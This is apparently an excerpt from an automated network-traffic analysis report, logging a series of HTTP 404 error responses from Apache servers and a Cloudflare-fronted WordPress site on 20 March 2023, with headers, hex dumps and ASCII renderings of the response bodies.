Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:57:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:57:53 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:57:56 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:57:59 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:58:01 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:58:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7a%2F30FD2FEz5VpSwuid0siEMJ6n2%2FCtEzxlkEkoIUGcifF6RQ8KQIDBUpYjHLJWYwZYEysz%2FL9mefaXafaPZANy%2BYDQ8RhiOAifw0dmHbRVETcOzLB%2BfHFADqSx73lc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aad7084ab889954-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1\|0s$TqaLRCwCI9v4>Fq
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:58:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KtQrJDlBZj%2Ft58J3QUSGCOMHfLkPeH%2BCN%2FRB87i3oGnNETYJABIREfIWJucOlOOfWKJR8GPOD3cHaQDpn1W5ye4vm93Aqa4OLMADRs4KzOsH6iWPyKdfP1u7ZLKvAAfd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aad70947d7e2c7b-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 74 ed c1 d4 Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1\|0s$TqaLRCwCI9v4>Fqt
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:58:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xgmjRK1VnDo7FlrHTHpJiPG98D7t1nvoWQShlHNojXdfoAwQR5TuwtxBbSb8EfNTmOzArsH8C%2BqROSKw3SpipWRBTE2X0nZOX22ao5JTXqW2V8PTe%2FKF6XJBR5Rit82n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aad70a45e7e360e-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 74 ed c1 d4 af 81 Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1\|0s$TqaLRCwCI9v4>Fqt
